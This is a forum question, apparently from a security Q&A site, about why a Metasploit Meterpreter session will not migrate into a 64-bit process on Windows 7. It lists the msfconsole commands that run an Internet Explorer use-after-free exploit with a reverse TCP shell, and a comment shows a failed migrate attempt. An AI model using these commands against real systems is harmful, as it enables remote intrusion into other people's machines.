# Unable to migrate meterpreter into 64 bit process?

Tags: windows, metasploit, meterpreter

How to migrate a meterpreter process into a 64 bit process?

When i run following exploit (`ie_execcommand_uaf`), it migrates into explorer which is 32 bit rather than to notepad.exe which is a 64 bit process.

```
msfconsole
use payload/windows/meterpreter/reverse_tcp
set LHOST 192.0.2.134
use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.0.2.134
set SRVPORT 8080
set URIPATH /
exploit
```

Please let me know why it is not migrating to 64 bit process or how to migrate to 64 bit process.

Target machine is Windows 7

Comment: Have you tried specifying the PID to migrate to?  I don't see any details on your migrate post module in the commands you've provided.

Comment: yes i tried to migrate to specific PID, but i got access denied.4076  2648  notepad.exe        x64   1                      

meterpreter > migrate 4076
[*] Migrating from 1356 to 4076...
[-] core_migrate: Operation failed: Access is denied.